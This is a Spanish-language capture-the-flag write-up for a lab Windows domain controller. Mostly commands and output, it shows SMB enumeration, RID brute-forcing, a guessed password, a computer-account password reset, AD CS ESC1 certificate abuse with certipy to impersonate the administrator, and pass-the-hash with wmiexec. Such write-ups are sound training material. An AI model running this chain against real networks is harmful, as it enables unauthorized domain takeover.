PortScan

  • Hacemos un escaneo buscando puertos abiertos por el protocolo TCP.
➜  content cat ../nmap/targeted
# Nmap 7.94SVN scan initiated Sun Mar  3 17:26:17 2024 as: nmap -sCV -p53,135,139,389,445,464,3389,49719 -oN targeted 10.10.65.176
Nmap scan report for 10.10.65.176
Host is up (0.19s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-03-02T23:18:09
|_Not valid after:  2024-09-01T23:18:09
|_ssl-date: 2024-03-03T23:28:08+00:00; -1s from scanner time.
| rdp-ntlm-info:
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-03-03T23:27:29+00:00
49719/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-03-03T23:27:31
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

SMB Enumeration

  • Vamos a agregar los dominios que tenemos al /etc/hosts .
➜  content echo "10.10.65.176 retro.vl DC.retro.vl" | sudo tee -a /etc/hosts
  • Vemos que estamos ante una máquina Windows 10 .
➜  content crackmapexec smb 10.10.65.176
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
  • Si enumeramos los recursos compartidos por smb encontramos Trainees empleando un Null Session .
➜  content smbclient -L 10.10.65.176 -N

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	Notes           Disk
	SYSVOL          Disk      Logon server share
	Trainees        Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.65.176 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • Vamos a conectarnos al recurso compartido.
➜  content smbclient //10.10.65.176/trainees
Password for [WORKGROUP\miguel]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sun Jul 23 15:58:43 2023
  ..                                DHS        0  Wed Jul 26 03:54:14 2023
  Important.txt                       A      288  Sun Jul 23 16:00:13 2023

		6261499 blocks of size 4096. 2892471 blocks available
smb: \>
  • Encontramos lo siguiente.
smb: \> get Important.txt
getting file \Important.txt of size 288 as Important.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
➜  content cat Important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins%
  • Y bueno, nos dicen que él la administración está cansada de tener que lidiar con el problema recurrente de las contraseñas olvidadas, crearon una cuenta para todos los trainees.

  • Según el admin creo una cuenta para todos, vamos a realizar un ataque de fuerza bruta con crackmapexec con los RIDs de los usuarios del dominio junto con sus SID .

➜  content crackmapexec smb 10.10.65.176 -u 'guest' -p '' --rid-brute
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [+] retro.vl\guest:
SMB         10.10.65.176    445    DC               [+] Brute forcing RIDs
SMB         10.10.65.176    445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         10.10.65.176    445    DC               501: RETRO\Guest (SidTypeUser)
SMB         10.10.65.176    445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         10.10.65.176    445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         10.10.65.176    445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         10.10.65.176    445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         10.10.65.176    445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         10.10.65.176    445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.65.176    445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.65.176    445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         10.10.65.176    445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.65.176    445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.65.176    445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.65.176    445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.65.176    445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         10.10.65.176    445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         10.10.65.176    445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.65.176    445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         10.10.65.176    445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         10.10.65.176    445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         10.10.65.176    445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         10.10.65.176    445    DC               1109: RETRO\tblack (SidTypeUser)
➜  content
  • Vemos que el usuario trainee existe y bueno como el admin dice que han tenido dificultades para recordar contraseñas fuertes y únicas la contraseña de los usuarios tiene que ser muy fácil si probamos con la contraseña del nombre de usuario vemos que es correcta.
➜  content crackmapexec smb 10.10.65.176 -u 'trainee' -p 'trainee'
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [+] retro.vl\trainee:trainee
  • Vamos a enumerar los recursos compartidos por smb, ya que tenemos credenciales válidas.
➜  content crackmapexec smb 10.10.65.176 -u 'trainee' -p 'trainee' --shares
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [+] retro.vl\trainee:trainee
SMB         10.10.65.176    445    DC               [+] Enumerated shares
SMB         10.10.65.176    445    DC               Share           Permissions     Remark
SMB         10.10.65.176    445    DC               -----           -----------     ------
SMB         10.10.65.176    445    DC               ADMIN$                          Remote Admin
SMB         10.10.65.176    445    DC               C$                              Default share
SMB         10.10.65.176    445    DC               IPC$            READ            Remote IPC
SMB         10.10.65.176    445    DC               NETLOGON        READ            Logon server share
SMB         10.10.65.176    445    DC               Notes           READ
SMB         10.10.65.176    445    DC               SYSVOL          READ            Logon server share
SMB         10.10.65.176    445    DC               Trainees        READ
➜  content
  • Y bueno, no vemos mucho más que Notes a sí que vamos a usar smbclient para conectarnos.

  • Y bueno, vemos un .txt vamos a descargarlo.

➜  content smbclient //10.10.65.176/Notes -U trainee%trainee
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jul 23 16:03:16 2023
  ..                                DHS        0  Wed Jul 26 03:54:14 2023
  ToDo.txt                            A      248  Sun Jul 23 16:05:56 2023

		6261499 blocks of size 4096. 2891438 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \>
  • Este es el contenido.
➜  content cat ToDo.txt
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James%                                                                                                                                             ➜  content

Pre created computer account

  • Como hablan de Finance department $ si recordamos encontramos esto.
SMB         10.10.65.176    445    DC               1106: RETRO\BANKING$ 
  • Si buscamos en internet encontramos la siguiente información que es muy útil.

  • Podemos intentar con crackmapexec para ver si alguna de las contraseñas son correctas.
➜  content  crackmapexec smb 10.10.65.176 -u 'BANKING$' -p 'banking'
SMB         10.10.65.176    445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.65.176    445    DC               [-] retro.vl\BANKING$:banking STATUS_LOGON_FAILURE
  • Nos dice que FAILURE, pero si leemos el artículo encontramos esto.

  • Bueno, si investigamos vemos que lo que tenemos que hacer es cambiar la contraseña.

  • También no lo dicen en el artículo en la parte de Changing the password además nos dicen que usemos RPC vamos a usar una herramienta de impacket para cambiarnos la contraseña. (Si ven una IP diferente es por qué pause la máquina y la volví arrancar y me cambio la IP).
➜  content impacket-changepasswd 'retro.vl/BANKING$':banking@10.10.121.174 -newpass Passwordxd1234 -dc-ip 10.10.121.174 -p rpc-samr
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Changing the password of retro.vl\BANKING$
[*] Connecting to DCE/RPC as retro.vl\BANKING$
[*] Password was changed successfully.
  • Ahora verificamos que la contraseña fue cambiada de manera exitosa.
➜  content crackmapexec smb 10.10.121.174 -u 'BANKING$' -p 'Passwordxd1234'
SMB         10.10.121.174   445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.121.174   445    DC               [+] retro.vl\BANKING$:Passwordxd1234

Active Directory Certificate Services

➜  content certipy-ad find -u 'BANKING$'@retro.vl -p Passwordxd1234 -dc-ip 10.10.121.174 -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
  • retro.vl usa AD CS y además usa varios templates que hay uno vulnerable.

ESC1 template

  • Vemos que el template es vulnerable a ESC1 que afecta a todos los equipos del dominio, los equipos del dominio tienen la capacidad de inscribirse (enroll) para obtener certificados, y que el solicitante (enrollee) puede proporcionar el sujeto del certificado. Además, la plantilla de certificado permite la autenticación del cliente. La plantilla que se utiliza es RetroClients https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/ .

  • Podemos usar certipy para solicitar un certificado.

  • Vemos que nos dice que existe un mínimo para la key RSA.

➜  content certipy-ad req -u 'BANKING$'@retro.vl -p Passwordxd1234 -dc-ip 10.10.121.174 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 8
Would you like to save the private key? (y/N)

  • Vamos a proporcionar la medida exacta para que funcione.
➜  content certipy-ad req -u 'BANKING$'@retro.vl -p Passwordxd1234 -dc-ip 10.10.121.174 -ca retro-DC-CA -template RetroClients -upn administrator@retro.vl -key-size 4096
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 10
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
  • Ahora vamos a autenticarnos para obtener le TGT este es un tipo de credencial que se utiliza en el protocolo Kerberos para autenticar a un usuario en un dominio.
➜  content certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.121.174
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': ********************************:********************************
➜  content
  • Y bueno ahora que tenemos el hash vamos a obtener un shell empleando Pass the Hash .

Shell as administrator

  • Y podemos en la misma ruta de siempre vemos la flag.
➜  content impacket-wmiexec administrator@10.10.121.174 -hashes ********************************:********************************
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
retro\administrator
C:\>type C:\Users\administrator\Desktop\root.txt
VL{************************}
C:\>